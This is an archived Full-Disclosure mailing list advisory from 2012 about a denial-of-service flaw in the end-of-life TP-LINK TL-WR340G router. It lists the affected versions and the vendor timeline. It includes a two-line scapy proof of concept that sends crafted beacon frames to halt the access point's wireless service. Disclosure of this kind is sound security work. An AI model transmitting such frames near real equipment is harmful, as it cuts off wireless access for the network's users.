[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] TP-LINK TL-WR340G Wireless Denial of Service
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] TP-LINK TL-WR340G Wireless Denial of Service
- From: "Adam P." <ziherung.pl@xxxxxxxxx>
- Date: Tue, 04 Sep 2012 20:14:24 +0200
=== intro ===
TP-LINK TL-WR340G is a SOHO router with integrated IEEE 802.11b/g AP.
Now it's marked End-of-Life.
Transmitting crafted frames in proximity of working router cause device
to malfunction. Wireless communication stops, existing clients don't
receive frames from AP ( except beacons ), new clients can't connect.
=== details ===
Affected product: TL-WR340G Wireless router
Firm Version: 4.7.11 Build 101102 Rel.60376n
Hardware Version: WR340G v3
Local/remote: Local ( wirelessly )
Vulnerability can be spotted by crafting and transmitting frame with scapy:
>> fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="<AP
MAC>",addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt()
>> sendp(fr,iface="injection capable wireless interface",count=5)
Attacker could cease wireless traffic. To resume AP functionality user
must restart wireless interface in WebGUI or restart device.
=== time-line ===
2.08.2012 - vendor notified
4.09.2012 - no response from vendor, published
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/